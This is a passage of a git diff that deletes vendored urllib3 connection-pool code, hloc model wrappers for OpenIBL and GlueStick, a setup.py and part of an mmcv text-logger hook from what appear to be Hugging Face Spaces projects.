multithreaded situations. If ``block`` is set to False, more - connections will be created but they will not be saved once they've - been used. - - :param block: - If set to True, no more than ``maxsize`` connections will be used at - a time. When no free connections are available, the call will block - until a connection has been released. This is a useful side effect for - particular multithreaded situations where one does not want to use more - than maxsize connections per host to prevent flooding. - - :param headers: - Headers to include with all requests, unless other headers are given - explicitly. - - :param retries: - Retry configuration to use by default with requests in this pool. - - :param _proxy: - Parsed proxy URL, should not be used directly, instead, see - :class:`urllib3.ProxyManager` - - :param _proxy_headers: - A dictionary with proxy headers, should not be used directly, - instead, see :class:`urllib3.ProxyManager` - - :param \\**conn_kw: - Additional parameters are used to create fresh :class:`urllib3.connection.HTTPConnection`, - :class:`urllib3.connection.HTTPSConnection` instances. 
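# [Editor's illustrative sketch -- not part of the original file or this diff.]
# Minimal usage of the thread-safe pool whose parameters are documented above,
# shown against the public urllib3 package for brevity; the host and path are
# hypothetical.
from urllib3 import HTTPConnectionPool

pool = HTTPConnectionPool("example.com", maxsize=2, block=True, retries=3)
response = pool.urlopen("GET", "/")          # sockets are reused across requests
print(response.status, len(response.data))
pool.close()                                 # close all pooled connections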
- """ - - scheme = "http" - ConnectionCls = HTTPConnection - ResponseCls = HTTPResponse - - def __init__( - self, - host, - port=None, - strict=False, - timeout=Timeout.DEFAULT_TIMEOUT, - maxsize=1, - block=False, - headers=None, - retries=None, - _proxy=None, - _proxy_headers=None, - _proxy_config=None, - **conn_kw - ): - ConnectionPool.__init__(self, host, port) - RequestMethods.__init__(self, headers) - - self.strict = strict - - if not isinstance(timeout, Timeout): - timeout = Timeout.from_float(timeout) - - if retries is None: - retries = Retry.DEFAULT - - self.timeout = timeout - self.retries = retries - - self.pool = self.QueueCls(maxsize) - self.block = block - - self.proxy = _proxy - self.proxy_headers = _proxy_headers or {} - self.proxy_config = _proxy_config - - # Fill the queue up so that doing get() on it will block properly - for _ in xrange(maxsize): - self.pool.put(None) - - # These are mostly for testing and debugging purposes. - self.num_connections = 0 - self.num_requests = 0 - self.conn_kw = conn_kw - - if self.proxy: - # Enable Nagle's algorithm for proxies, to avoid packet fragmentation. - # We cannot know if the user has added default socket options, so we cannot replace the - # list. - self.conn_kw.setdefault("socket_options", []) - - self.conn_kw["proxy"] = self.proxy - self.conn_kw["proxy_config"] = self.proxy_config - - def _new_conn(self): - """ - Return a fresh :class:`HTTPConnection`. - """ - self.num_connections += 1 - log.debug( - "Starting new HTTP connection (%d): %s:%s", - self.num_connections, - self.host, - self.port or "80", - ) - - conn = self.ConnectionCls( - host=self.host, - port=self.port, - timeout=self.timeout.connect_timeout, - strict=self.strict, - **self.conn_kw - ) - return conn - - def _get_conn(self, timeout=None): - """ - Get a connection. Will return a pooled connection if one is available. - - If no connections are available and :prop:`.block` is ``False``, then a - fresh connection is returned. - - :param timeout: - Seconds to wait before giving up and raising - :class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and - :prop:`.block` is ``True``. - """ - conn = None - try: - conn = self.pool.get(block=self.block, timeout=timeout) - - except AttributeError: # self.pool is None - raise ClosedPoolError(self, "Pool is closed.") - - except queue.Empty: - if self.block: - raise EmptyPoolError( - self, - "Pool reached maximum size and no more connections are allowed.", - ) - pass # Oh well, we'll create a new connection then - - # If this is a persistent connection, check if it got disconnected - if conn and is_connection_dropped(conn): - log.debug("Resetting dropped connection: %s", self.host) - conn.close() - if getattr(conn, "auto_open", 1) == 0: - # This is a proxied connection that has been mutated by - # http.client._tunnel() and cannot be reused (since it would - # attempt to bypass the proxy) - conn = None - - return conn or self._new_conn() - - def _put_conn(self, conn): - """ - Put a connection back into the pool. - - :param conn: - Connection object for the current host and port as returned by - :meth:`._new_conn` or :meth:`._get_conn`. - - If the pool is already full, the connection is closed and discarded - because we exceeded maxsize. If connections are discarded frequently, - then maxsize should be increased. - - If the pool is closed, then the connection will be closed and discarded. - """ - try: - self.pool.put(conn, block=False) - return # Everything is dandy, done. - except AttributeError: - # self.pool is None. 
- pass - except queue.Full: - # This should never happen if self.block == True - log.warning( - "Connection pool is full, discarding connection: %s. Connection pool size: %s", - self.host, - self.pool.qsize(), - ) - # Connection never got put back into the pool, close it. - if conn: - conn.close() - - def _validate_conn(self, conn): - """ - Called right before a request is made, after the socket is created. - """ - pass - - def _prepare_proxy(self, conn): - # Nothing to do for HTTP connections. - pass - - def _get_timeout(self, timeout): - """Helper that always returns a :class:`urllib3.util.Timeout`""" - if timeout is _Default: - return self.timeout.clone() - - if isinstance(timeout, Timeout): - return timeout.clone() - else: - # User passed us an int/float. This is for backwards compatibility, - # can be removed later - return Timeout.from_float(timeout) - - def _raise_timeout(self, err, url, timeout_value): - """Is the error actually a timeout? Will raise a ReadTimeout or pass""" - - if isinstance(err, SocketTimeout): - raise ReadTimeoutError( - self, url, "Read timed out. (read timeout=%s)" % timeout_value - ) - - # See the above comment about EAGAIN in Python 3. In Python 2 we have - # to specifically catch it and throw the timeout error - if hasattr(err, "errno") and err.errno in _blocking_errnos: - raise ReadTimeoutError( - self, url, "Read timed out. (read timeout=%s)" % timeout_value - ) - - # Catch possible read timeouts thrown as SSL errors. If not the - # case, rethrow the original. We need to do this because of: - # http://bugs.python.org/issue10272 - if "timed out" in str(err) or "did not complete (read)" in str( - err - ): # Python < 2.7.4 - raise ReadTimeoutError( - self, url, "Read timed out. (read timeout=%s)" % timeout_value - ) - - def _make_request( - self, conn, method, url, timeout=_Default, chunked=False, **httplib_request_kw - ): - """ - Perform a request on a given urllib connection object taken from our - pool. - - :param conn: - a connection from one of our connection pools - - :param timeout: - Socket timeout in seconds for the request. This can be a - float or integer, which will set the same timeout value for - the socket connect and the socket read, or an instance of - :class:`urllib3.util.Timeout`, which gives you more fine-grained - control over your timeouts. - """ - self.num_requests += 1 - - timeout_obj = self._get_timeout(timeout) - timeout_obj.start_connect() - conn.timeout = timeout_obj.connect_timeout - - # Trigger any extra validation we need to do. - try: - self._validate_conn(conn) - except (SocketTimeout, BaseSSLError) as e: - # Py2 raises this as a BaseSSLError, Py3 raises it as socket timeout. - self._raise_timeout(err=e, url=url, timeout_value=conn.timeout) - raise - - # conn.request() calls http.client.*.request, not the method in - # urllib3.request. It also calls makefile (recv) on the socket. - try: - if chunked: - conn.request_chunked(method, url, **httplib_request_kw) - else: - conn.request(method, url, **httplib_request_kw) - - # We are swallowing BrokenPipeError (errno.EPIPE) since the server is - # legitimately able to close the connection after sending a valid response. - # With this behaviour, the received response is still readable. 
- except BrokenPipeError: - # Python 3 - pass - except IOError as e: - # Python 2 and macOS/Linux - # EPIPE and ESHUTDOWN are BrokenPipeError on Python 2, and EPROTOTYPE is needed on macOS - # https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/ - if e.errno not in { - errno.EPIPE, - errno.ESHUTDOWN, - errno.EPROTOTYPE, - }: - raise - - # Reset the timeout for the recv() on the socket - read_timeout = timeout_obj.read_timeout - - # App Engine doesn't have a sock attr - if getattr(conn, "sock", None): - # In Python 3 socket.py will catch EAGAIN and return None when you - # try and read into the file pointer created by http.client, which - # instead raises a BadStatusLine exception. Instead of catching - # the exception and assuming all BadStatusLine exceptions are read - # timeouts, check for a zero timeout before making the request. - if read_timeout == 0: - raise ReadTimeoutError( - self, url, "Read timed out. (read timeout=%s)" % read_timeout - ) - if read_timeout is Timeout.DEFAULT_TIMEOUT: - conn.sock.settimeout(socket.getdefaulttimeout()) - else: # None or a value - conn.sock.settimeout(read_timeout) - - # Receive the response from the server - try: - try: - # Python 2.7, use buffering of HTTP responses - httplib_response = conn.getresponse(buffering=True) - except TypeError: - # Python 3 - try: - httplib_response = conn.getresponse() - except BaseException as e: - # Remove the TypeError from the exception chain in - # Python 3 (including for exceptions like SystemExit). - # Otherwise it looks like a bug in the code. - six.raise_from(e, None) - except (SocketTimeout, BaseSSLError, SocketError) as e: - self._raise_timeout(err=e, url=url, timeout_value=read_timeout) - raise - - # AppEngine doesn't have a version attr. - http_version = getattr(conn, "_http_vsn_str", "HTTP/?") - log.debug( - '%s://%s:%s "%s %s %s" %s %s', - self.scheme, - self.host, - self.port, - method, - url, - http_version, - httplib_response.status, - httplib_response.length, - ) - - try: - assert_header_parsing(httplib_response.msg) - except (HeaderParsingError, TypeError) as hpe: # Platform-specific: Python 3 - log.warning( - "Failed to parse headers (url=%s): %s", - self._absolute_url(url), - hpe, - exc_info=True, - ) - - return httplib_response - - def _absolute_url(self, path): - return Url(scheme=self.scheme, host=self.host, port=self.port, path=path).url - - def close(self): - """ - Close all pooled connections and disable the pool. - """ - if self.pool is None: - return - # Disable access to the pool - old_pool, self.pool = self.pool, None - - try: - while True: - conn = old_pool.get(block=False) - if conn: - conn.close() - - except queue.Empty: - pass # Done. - - def is_same_host(self, url): - """ - Check if the given ``url`` is a member of the same host as this - connection pool. - """ - if url.startswith("/"): - return True - - # TODO: Add optional support for socket.gethostbyname checking. 
- scheme, host, port = get_host(url) - if host is not None: - host = _normalize_host(host, scheme=scheme) - - # Use explicit default port for comparison when none is given - if self.port and not port: - port = port_by_scheme.get(scheme) - elif not self.port and port == port_by_scheme.get(scheme): - port = None - - return (scheme, host, port) == (self.scheme, self.host, self.port) - - def urlopen( - self, - method, - url, - body=None, - headers=None, - retries=None, - redirect=True, - assert_same_host=True, - timeout=_Default, - pool_timeout=None, - release_conn=None, - chunked=False, - body_pos=None, - **response_kw - ): - """ - Get a connection from the pool and perform an HTTP request. This is the - lowest level call for making a request, so you'll need to specify all - the raw details. - - .. note:: - - More commonly, it's appropriate to use a convenience method provided - by :class:`.RequestMethods`, such as :meth:`request`. - - .. note:: - - `release_conn` will only behave as expected if - `preload_content=False` because we want to make - `preload_content=False` the default behaviour someday soon without - breaking backwards compatibility. - - :param method: - HTTP request method (such as GET, POST, PUT, etc.) - - :param url: - The URL to perform the request on. - - :param body: - Data to send in the request body, either :class:`str`, :class:`bytes`, - an iterable of :class:`str`/:class:`bytes`, or a file-like object. - - :param headers: - Dictionary of custom headers to send, such as User-Agent, - If-None-Match, etc. If None, pool headers are used. If provided, - these headers completely replace any pool-specific headers. - - :param retries: - Configure the number of retries to allow before raising a - :class:`~urllib3.exceptions.MaxRetryError` exception. - - Pass ``None`` to retry until you receive a response. Pass a - :class:`~urllib3.util.retry.Retry` object for fine-grained control - over different types of retries. - Pass an integer number to retry connection errors that many times, - but no other types of errors. Pass zero to never retry. - - If ``False``, then retries are disabled and any exception is raised - immediately. Also, instead of raising a MaxRetryError on redirects, - the redirect response will be returned. - - :type retries: :class:`~urllib3.util.retry.Retry`, False, or an int. - - :param redirect: - If True, automatically handle redirects (status codes 301, 302, - 303, 307, 308). Each redirect counts as a retry. Disabling retries - will disable redirect, too. - - :param assert_same_host: - If ``True``, will make sure that the host of the pool requests is - consistent else will raise HostChangedError. When ``False``, you can - use the pool on an HTTP proxy and request foreign hosts. - - :param timeout: - If specified, overrides the default timeout for this one - request. It may be a float (in seconds) or an instance of - :class:`urllib3.util.Timeout`. - - :param pool_timeout: - If set and the pool is set to block=True, then this method will - block for ``pool_timeout`` seconds and raise EmptyPoolError if no - connection is available within the time period. - - :param release_conn: - If False, then the urlopen call will not release the connection - back into the pool once a response is received (but will release if - you read the entire contents of the response such as when - `preload_content=True`). This is useful if you're not preloading - the response's content immediately. 
You will need to call - ``r.release_conn()`` on the response ``r`` to return the connection - back into the pool. If None, it takes the value of - ``response_kw.get('preload_content', True)``. - - :param chunked: - If True, urllib3 will send the body using chunked transfer - encoding. Otherwise, urllib3 will send the body using the standard - content-length form. Defaults to False. - - :param int body_pos: - Position to seek to in file-like body in the event of a retry or - redirect. Typically this won't need to be set because urllib3 will - auto-populate the value when needed. - - :param \\**response_kw: - Additional parameters are passed to - :meth:`urllib3.response.HTTPResponse.from_httplib` - """ - - parsed_url = parse_url(url) - destination_scheme = parsed_url.scheme - - if headers is None: - headers = self.headers - - if not isinstance(retries, Retry): - retries = Retry.from_int(retries, redirect=redirect, default=self.retries) - - if release_conn is None: - release_conn = response_kw.get("preload_content", True) - - # Check host - if assert_same_host and not self.is_same_host(url): - raise HostChangedError(self, url, retries) - - # Ensure that the URL we're connecting to is properly encoded - if url.startswith("/"): - url = six.ensure_str(_encode_target(url)) - else: - url = six.ensure_str(parsed_url.url) - - conn = None - - # Track whether `conn` needs to be released before - # returning/raising/recursing. Update this variable if necessary, and - # leave `release_conn` constant throughout the function. That way, if - # the function recurses, the original value of `release_conn` will be - # passed down into the recursive call, and its value will be respected. - # - # See issue #651 [1] for details. - # - # [1] - release_this_conn = release_conn - - http_tunnel_required = connection_requires_http_tunnel( - self.proxy, self.proxy_config, destination_scheme - ) - - # Merge the proxy headers. Only done when not using HTTP CONNECT. We - # have to copy the headers dict so we can safely change it without those - # changes being reflected in anyone else's copy. - if not http_tunnel_required: - headers = headers.copy() - headers.update(self.proxy_headers) - - # Must keep the exception bound to a separate variable or else Python 3 - # complains about UnboundLocalError. - err = None - - # Keep track of whether we cleanly exited the except block. This - # ensures we do proper cleanup in finally. - clean_exit = False - - # Rewind body position, if needed. Record current position - # for future rewinds in the event of a redirect/retry. - body_pos = set_file_position(body, body_pos) - - try: - # Request a connection from the queue. - timeout_obj = self._get_timeout(timeout) - conn = self._get_conn(timeout=pool_timeout) - - conn.timeout = timeout_obj.connect_timeout - - is_new_proxy_conn = self.proxy is not None and not getattr( - conn, "sock", None - ) - if is_new_proxy_conn and http_tunnel_required: - self._prepare_proxy(conn) - - # Make the request on the httplib connection object. - httplib_response = self._make_request( - conn, - method, - url, - timeout=timeout_obj, - body=body, - headers=headers, - chunked=chunked, - ) - - # If we're going to release the connection in ``finally:``, then - # the response doesn't need to know about the connection. Otherwise - # it will also try to release it and we'll have a double-release - # mess. 
- response_conn = conn if not release_conn else None - - # Pass method to Response for length checking - response_kw["request_method"] = method - - # Import httplib's response into our own wrapper object - response = self.ResponseCls.from_httplib( - httplib_response, - pool=self, - connection=response_conn, - retries=retries, - **response_kw - ) - - # Everything went great! - clean_exit = True - - except EmptyPoolError: - # Didn't get a connection from the pool, no need to clean up - clean_exit = True - release_this_conn = False - raise - - except ( - TimeoutError, - HTTPException, - SocketError, - ProtocolError, - BaseSSLError, - SSLError, - CertificateError, - ) as e: - # Discard the connection for these exceptions. It will be - # replaced during the next _get_conn() call. - clean_exit = False - - def _is_ssl_error_message_from_http_proxy(ssl_error): - # We're trying to detect the message 'WRONG_VERSION_NUMBER' but - # SSLErrors are kinda all over the place when it comes to the message, - # so we try to cover our bases here! - message = " ".join(re.split("[^a-z]", str(ssl_error).lower())) - return ( - "wrong version number" in message or "unknown protocol" in message - ) - - # Try to detect a common user error with proxies which is to - # set an HTTP proxy to be HTTPS when it should be 'http://' - # (ie {'http': 'http://proxy', 'https': 'https://proxy'}) - # Instead we add a nice error message and point to a URL. - if ( - isinstance(e, BaseSSLError) - and self.proxy - and _is_ssl_error_message_from_http_proxy(e) - and conn.proxy - and conn.proxy.scheme == "https" - ): - e = ProxyError( - "Your proxy appears to only use HTTP and not HTTPS, " - "try changing your proxy URL to be HTTP. See: " - "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" - "#https-proxy-error-http-proxy", - SSLError(e), - ) - elif isinstance(e, (BaseSSLError, CertificateError)): - e = SSLError(e) - elif isinstance(e, (SocketError, NewConnectionError)) and self.proxy: - e = ProxyError("Cannot connect to proxy.", e) - elif isinstance(e, (SocketError, HTTPException)): - e = ProtocolError("Connection aborted.", e) - - retries = retries.increment( - method, url, error=e, _pool=self, _stacktrace=sys.exc_info()[2] - ) - retries.sleep() - - # Keep track of the error for the retry warning. - err = e - - finally: - if not clean_exit: - # We hit some kind of exception, handled or otherwise. We need - # to throw the connection away unless explicitly told not to. - # Close the connection, set the variable to None, and make sure - # we put the None back in the pool to avoid leaking it. - conn = conn and conn.close() - release_this_conn = True - - if release_this_conn: - # Put the connection back to be reused. If the connection is - # expired then it will be None, which will get replaced with a - # fresh connection during _get_conn. - self._put_conn(conn) - - if not conn: - # Try again - log.warning( - "Retrying (%r) after connection broken by '%r': %s", retries, err, url - ) - return self.urlopen( - method, - url, - body, - headers, - retries, - redirect, - assert_same_host, - timeout=timeout, - pool_timeout=pool_timeout, - release_conn=release_conn, - chunked=chunked, - body_pos=body_pos, - **response_kw - ) - - # Handle redirect? 
- redirect_location = redirect and response.get_redirect_location() - if redirect_location: - if response.status == 303: - method = "GET" - - try: - retries = retries.increment(method, url, response=response, _pool=self) - except MaxRetryError: - if retries.raise_on_redirect: - response.drain_conn() - raise - return response - - response.drain_conn() - retries.sleep_for_retry(response) - log.debug("Redirecting %s -> %s", url, redirect_location) - return self.urlopen( - method, - redirect_location, - body, - headers, - retries=retries, - redirect=redirect, - assert_same_host=assert_same_host, - timeout=timeout, - pool_timeout=pool_timeout, - release_conn=release_conn, - chunked=chunked, - body_pos=body_pos, - **response_kw - ) - - # Check if we should retry the HTTP response. - has_retry_after = bool(response.getheader("Retry-After")) - if retries.is_retry(method, response.status, has_retry_after): - try: - retries = retries.increment(method, url, response=response, _pool=self) - except MaxRetryError: - if retries.raise_on_status: - response.drain_conn() - raise - return response - - response.drain_conn() - retries.sleep(response) - log.debug("Retry: %s", url) - return self.urlopen( - method, - url, - body, - headers, - retries=retries, - redirect=redirect, - assert_same_host=assert_same_host, - timeout=timeout, - pool_timeout=pool_timeout, - release_conn=release_conn, - chunked=chunked, - body_pos=body_pos, - **response_kw - ) - - return response - - -class HTTPSConnectionPool(HTTPConnectionPool): - """ - Same as :class:`.HTTPConnectionPool`, but HTTPS. - - :class:`.HTTPSConnection` uses one of ``assert_fingerprint``, - ``assert_hostname`` and ``host`` in this order to verify connections. - If ``assert_hostname`` is False, no verification is done. - - The ``key_file``, ``cert_file``, ``cert_reqs``, ``ca_certs``, - ``ca_cert_dir``, ``ssl_version``, ``key_password`` are only used if :mod:`ssl` - is available and are fed into :meth:`urllib3.util.ssl_wrap_socket` to upgrade - the connection socket into an SSL socket. - """ - - scheme = "https" - ConnectionCls = HTTPSConnection - - def __init__( - self, - host, - port=None, - strict=False, - timeout=Timeout.DEFAULT_TIMEOUT, - maxsize=1, - block=False, - headers=None, - retries=None, - _proxy=None, - _proxy_headers=None, - key_file=None, - cert_file=None, - cert_reqs=None, - key_password=None, - ca_certs=None, - ssl_version=None, - assert_hostname=None, - assert_fingerprint=None, - ca_cert_dir=None, - **conn_kw - ): - - HTTPConnectionPool.__init__( - self, - host, - port, - strict, - timeout, - maxsize, - block, - headers, - retries, - _proxy, - _proxy_headers, - **conn_kw - ) - - self.key_file = key_file - self.cert_file = cert_file - self.cert_reqs = cert_reqs - self.key_password = key_password - self.ca_certs = ca_certs - self.ca_cert_dir = ca_cert_dir - self.ssl_version = ssl_version - self.assert_hostname = assert_hostname - self.assert_fingerprint = assert_fingerprint - - def _prepare_conn(self, conn): - """ - Prepare the ``connection`` for :meth:`urllib3.util.ssl_wrap_socket` - and establish the tunnel if proxy is used. 
- """ - - if isinstance(conn, VerifiedHTTPSConnection): - conn.set_cert( - key_file=self.key_file, - key_password=self.key_password, - cert_file=self.cert_file, - cert_reqs=self.cert_reqs, - ca_certs=self.ca_certs, - ca_cert_dir=self.ca_cert_dir, - assert_hostname=self.assert_hostname, - assert_fingerprint=self.assert_fingerprint, - ) - conn.ssl_version = self.ssl_version - return conn - - def _prepare_proxy(self, conn): - """ - Establishes a tunnel connection through HTTP CONNECT. - - Tunnel connection is established early because otherwise httplib would - improperly set Host: header to proxy's IP:port. - """ - - conn.set_tunnel(self._proxy_host, self.port, self.proxy_headers) - - if self.proxy.scheme == "https": - conn.tls_in_tls_required = True - - conn.connect() - - def _new_conn(self): - """ - Return a fresh :class:`http.client.HTTPSConnection`. - """ - self.num_connections += 1 - log.debug( - "Starting new HTTPS connection (%d): %s:%s", - self.num_connections, - self.host, - self.port or "443", - ) - - if not self.ConnectionCls or self.ConnectionCls is DummyConnection: - raise SSLError( - "Can't connect to HTTPS URL because the SSL module is not available." - ) - - actual_host = self.host - actual_port = self.port - if self.proxy is not None: - actual_host = self.proxy.host - actual_port = self.proxy.port - - conn = self.ConnectionCls( - host=actual_host, - port=actual_port, - timeout=self.timeout.connect_timeout, - strict=self.strict, - cert_file=self.cert_file, - key_file=self.key_file, - key_password=self.key_password, - **self.conn_kw - ) - - return self._prepare_conn(conn) - - def _validate_conn(self, conn): - """ - Called right before a request is made, after the socket is created. - """ - super(HTTPSConnectionPool, self)._validate_conn(conn) - - # Force connect early to allow us to validate the connection. - if not getattr(conn, "sock", None): # AppEngine might not have `.sock` - conn.connect() - - if not conn.is_verified: - warnings.warn( - ( - "Unverified HTTPS request is being made to host '%s'. " - "Adding certificate verification is strongly advised. See: " - "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" - "#ssl-warnings" % conn.host - ), - InsecureRequestWarning, - ) - - if getattr(conn, "proxy_is_verified", None) is False: - warnings.warn( - ( - "Unverified HTTPS connection done to an HTTPS proxy. " - "Adding certificate verification is strongly advised. See: " - "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" - "#ssl-warnings" - ), - InsecureRequestWarning, - ) - - -def connection_from_url(url, **kw): - """ - Given a url, return an :class:`.ConnectionPool` instance of its host. - - This is a shortcut for not having to parse out the scheme, host, and port - of the url before creating an :class:`.ConnectionPool` instance. - - :param url: - Absolute URL string that must include the scheme. Port is optional. - - :param \\**kw: - Passes additional parameters to the constructor of the appropriate - :class:`.ConnectionPool`. Useful for specifying things like - timeout, maxsize, headers, etc. - - Example:: - - >>> conn = connection_from_url('http://google.com/') - >>> r = conn.request('GET', '/') - """ - scheme, host, port = get_host(url) - port = port or port_by_scheme.get(scheme, 80) - if scheme == "https": - return HTTPSConnectionPool(host, port=port, **kw) - else: - return HTTPConnectionPool(host, port=port, **kw) - - -def _normalize_host(host, scheme): - """ - Normalize hosts for comparisons and use with sockets. 
- """ - - host = normalize_host(host, scheme) - - # httplib doesn't like it when we include brackets in IPv6 addresses - # Specifically, if we include brackets but also pass the port then - # httplib crazily doubles up the square brackets on the Host header. - # Instead, we need to make sure we never pass ``None`` as the port. - # However, for backward compatibility reasons we can't actually - # *assert* that. See http://bugs.python.org/issue28539 - if host.startswith("[") and host.endswith("]"): - host = host[1:-1] - return host diff --git a/spaces/Realcat/image-matching-webui/hloc/extractors/openibl.py b/spaces/Realcat/image-matching-webui/hloc/extractors/openibl.py deleted file mode 100644 index 9e332a4e0016fceb184dd850bd3b6f86231dad54..0000000000000000000000000000000000000000 --- a/spaces/Realcat/image-matching-webui/hloc/extractors/openibl.py +++ /dev/null @@ -1,26 +0,0 @@ -import torch -import torchvision.transforms as tvf - -from ..utils.base_model import BaseModel - - -class OpenIBL(BaseModel): - default_conf = { - "model_name": "vgg16_netvlad", - } - required_inputs = ["image"] - - def _init(self, conf): - self.net = torch.hub.load( - "yxgeee/OpenIBL", conf["model_name"], pretrained=True - ).eval() - mean = [0.48501960784313836, 0.4579568627450961, 0.4076039215686255] - std = [0.00392156862745098, 0.00392156862745098, 0.00392156862745098] - self.norm_rgb = tvf.Normalize(mean=mean, std=std) - - def _forward(self, data): - image = self.norm_rgb(data["image"]) - desc = self.net(image) - return { - "global_descriptor": desc, - } diff --git a/spaces/Realcat/image-matching-webui/hloc/matchers/gluestick.py b/spaces/Realcat/image-matching-webui/hloc/matchers/gluestick.py deleted file mode 100644 index 093ba3665c95ac881ae22682497fb5af5722a55b..0000000000000000000000000000000000000000 --- a/spaces/Realcat/image-matching-webui/hloc/matchers/gluestick.py +++ /dev/null @@ -1,109 +0,0 @@ -import sys -from pathlib import Path -import subprocess -import torch -from ..utils.base_model import BaseModel -from .. import logger - -gluestick_path = Path(__file__).parent / "../../third_party/GlueStick" -sys.path.append(str(gluestick_path)) - -from gluestick import batch_to_np -from gluestick.models.two_view_pipeline import TwoViewPipeline - -device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - - -class GlueStick(BaseModel): - default_conf = { - "name": "two_view_pipeline", - "model_name": "checkpoint_GlueStick_MD.tar", - "use_lines": True, - "max_keypoints": 1000, - "max_lines": 300, - "force_num_keypoints": False, - } - required_inputs = [ - "image0", - "image1", - ] - - gluestick_models = { - "checkpoint_GlueStick_MD.tar": "https://github.com/cvg/GlueStick/releases/download/v0.1_arxiv/checkpoint_GlueStick_MD.tar", - } - - # Initialize the line matcher - def _init(self, conf): - model_path = ( - gluestick_path / "resources" / "weights" / conf["model_name"] - ) - - # Download the model. 
- if not model_path.exists(): - model_path.parent.mkdir(exist_ok=True) - link = self.gluestick_models[conf["model_name"]] - cmd = ["wget", link, "-O", str(model_path)] - logger.info(f"Downloading the Gluestick model with `{cmd}`.") - subprocess.run(cmd, check=True) - logger.info(f"Loading GlueStick model...") - - gluestick_conf = { - "name": "two_view_pipeline", - "use_lines": True, - "extractor": { - "name": "wireframe", - "sp_params": { - "force_num_keypoints": False, - "max_num_keypoints": 1000, - }, - "wireframe_params": { - "merge_points": True, - "merge_line_endpoints": True, - }, - "max_n_lines": 300, - }, - "matcher": { - "name": "gluestick", - "weights": str(model_path), - "trainable": False, - }, - "ground_truth": { - "from_pose_depth": False, - }, - } - gluestick_conf["extractor"]["sp_params"]["max_num_keypoints"] = conf[ - "max_keypoints" - ] - gluestick_conf["extractor"]["sp_params"]["force_num_keypoints"] = conf[ - "force_num_keypoints" - ] - gluestick_conf["extractor"]["max_n_lines"] = conf["max_lines"] - self.net = TwoViewPipeline(gluestick_conf) - - def _forward(self, data): - pred = self.net(data) - - pred = batch_to_np(pred) - kp0, kp1 = pred["keypoints0"], pred["keypoints1"] - m0 = pred["matches0"] - - line_seg0, line_seg1 = pred["lines0"], pred["lines1"] - line_matches = pred["line_matches0"] - - valid_matches = m0 != -1 - match_indices = m0[valid_matches] - matched_kps0 = kp0[valid_matches] - matched_kps1 = kp1[match_indices] - - valid_matches = line_matches != -1 - match_indices = line_matches[valid_matches] - matched_lines0 = line_seg0[valid_matches] - matched_lines1 = line_seg1[match_indices] - - pred["raw_lines0"], pred["raw_lines1"] = line_seg0, line_seg1 - pred["lines0"], pred["lines1"] = matched_lines0, matched_lines1 - pred["keypoints0"], pred["keypoints1"] = torch.from_numpy( - matched_kps0 - ), torch.from_numpy(matched_kps1) - pred = {**pred, **data} - return pred diff --git a/spaces/Ricdeq/optimaldesign/setup.py b/spaces/Ricdeq/optimaldesign/setup.py deleted file mode 100644 index c422479f8b8751a704b23d7fbac88ccbe075360e..0000000000000000000000000000000000000000 --- a/spaces/Ricdeq/optimaldesign/setup.py +++ /dev/null @@ -1,19 +0,0 @@ -from setuptools import setup, find_packages - -setup( - name='blueprint_analyzer', - version='0.1', - packages=find_packages(), - install_requires=[ - 'gradio', - 'torch', - 'torchvision', - 'Pillow', -], - - entry_points={ - 'console_scripts': [ - 'analyze_blueprint=blueprint_analyzer.analyze_blueprint:main', - ], - }, -) diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/runner/hooks/logger/text.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/runner/hooks/logger/text.py deleted file mode 100644 index 87b1a3eca9595a130121526f8b4c29915387ab35..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/runner/hooks/logger/text.py +++ /dev/null @@ -1,256 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import datetime -import os -import os.path as osp -from collections import OrderedDict - -import torch -import torch.distributed as dist - -import annotator.uniformer.mmcv as mmcv -from annotator.uniformer.mmcv.fileio.file_client import FileClient -from annotator.uniformer.mmcv.utils import is_tuple_of, scandir -from ..hook import HOOKS -from .base import LoggerHook - - -@HOOKS.register_module() -class TextLoggerHook(LoggerHook): - """Logger hook in text. 
- - In this logger hook, the information will be printed on terminal and - saved in json file. - - Args: - by_epoch (bool, optional): Whether EpochBasedRunner is used. - Default: True. - interval (int, optional): Logging interval (every k iterations). - Default: 10. - ignore_last (bool, optional): Ignore the log of last iterations in each - epoch if less than :attr:`interval`. Default: True. - reset_flag (bool, optional): Whether to clear the output buffer after - logging. Default: False. - interval_exp_name (int, optional): Logging interval for experiment - name. This feature is to help users conveniently get the experiment - information from screen or log file. Default: 1000. - out_dir (str, optional): Logs are saved in ``runner.work_dir`` default. - If ``out_dir`` is specified, logs will be copied to a new directory - which is the concatenation of ``out_dir`` and the last level - directory of ``runner.work_dir``. Default: None. - `New in version 1.3.16.` - out_suffix (str or tuple[str], optional): Those filenames ending with - ``out_suffix`` will be copied to ``out_dir``. - Default: ('.log.json', '.log', '.py'). - `New in version 1.3.16.` - keep_local (bool, optional): Whether to keep local log when - :attr:`out_dir` is specified. If False, the local log will be - removed. Default: True. - `New in version 1.3.16.` - file_client_args (dict, optional): Arguments to instantiate a - FileClient. See :class:`mmcv.fileio.FileClient` for details. - Default: None. - `New in version 1.3.16.` - """ - - def __init__(self, - by_epoch=True, - interval=10, - ignore_last=True, - reset_flag=False, - interval_exp_name=1000, - out_dir=None, - out_suffix=('.log.json', '.log', '.py'), - keep_local=True, - file_client_args=None): - super(TextLoggerHook, self).__init__(interval, ignore_last, reset_flag, - by_epoch) - self.by_epoch = by_epoch - self.time_sec_tot = 0 - self.interval_exp_name = interval_exp_name - - if out_dir is None and file_client_args is not None: - raise ValueError( - 'file_client_args should be "None" when `out_dir` is not' - 'specified.') - self.out_dir = out_dir - - if not (out_dir is None or isinstance(out_dir, str) - or is_tuple_of(out_dir, str)): - raise TypeError('out_dir should be "None" or string or tuple of ' - 'string, but got {out_dir}') - self.out_suffix = out_suffix - - self.keep_local = keep_local - self.file_client_args = file_client_args - if self.out_dir is not None: - self.file_client = FileClient.infer_client(file_client_args, - self.out_dir) - - def before_run(self, runner): - super(TextLoggerHook, self).before_run(runner) - - if self.out_dir is not None: - self.file_client = 